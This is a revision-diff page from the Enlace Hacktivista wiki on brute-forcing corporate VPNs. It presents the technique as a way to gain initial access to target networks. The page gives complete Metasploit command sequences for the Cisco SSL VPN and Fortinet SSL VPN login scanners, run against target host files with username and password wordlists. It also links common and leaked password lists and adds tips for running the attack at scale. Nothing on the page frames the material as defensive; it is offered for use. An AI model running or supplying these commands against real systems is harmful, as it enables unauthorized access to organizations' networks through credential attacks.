VPN brute forcing: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
mNo edit summary
 
(5 intermediate revisions by the same user not shown)
Line 1: Line 1:
[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host files.
[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt smaller user] and [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt password] files.
 
Word lists:
* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords


You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.
== CISCO ==
== CISCO ==
<pre>
<pre>
Line 21: Line 23:
sudo systemctl start postgresql
sudo systemctl start postgresql
msfdb init
msfdb init
msfconsole
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
use auxiliary/scanner/http/fortinet_ssl_vpn

Latest revision as of 12:19, 30 March 2024

Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass port scanning. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.

Word lists:

CISCO

sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

FORTI SSL VPN

sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
Retrieved from "https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&oldid=1731"